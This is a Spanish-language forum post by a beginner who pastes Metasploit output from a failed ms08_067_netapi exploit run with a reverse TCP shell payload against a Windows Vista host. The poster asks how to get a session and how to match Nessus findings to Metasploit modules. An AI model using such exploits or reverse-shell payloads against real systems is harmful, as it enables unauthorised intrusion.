] Started reverse handler on 192.168.1.33:4444
- Automatically detecting the target...
- Fingerprint: Windows Vista Home Premium Service Pack 2 - lang:Unknown
- Could not determine the exact language pack
- Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
creo q ya he avanzado bastante
:D aunq estoy muy perdido aun...
segun me han dicho exploto bien pero no se porque razon no creo una sesion...
pero segui el tutorial ese y consegui esto.
como lo puedo solucionar¿?¿
utilice el set PAYLOAD windows/shell/reverse_tcp
si utilizo otros puede darme mejores resultados?¿?¡
otra cosa , haciendo el escaner con nessus me dio 14 vulnerabilidades entre ellas el puerto 445 q es la q intente hacer, pero si queiro probar otras como se q utilizar en metasploit¿?¿ MEDIENTA LA ID¿?¿?¡ algun sitio q de informacion de esto¿?¡
mil gracias de nuevo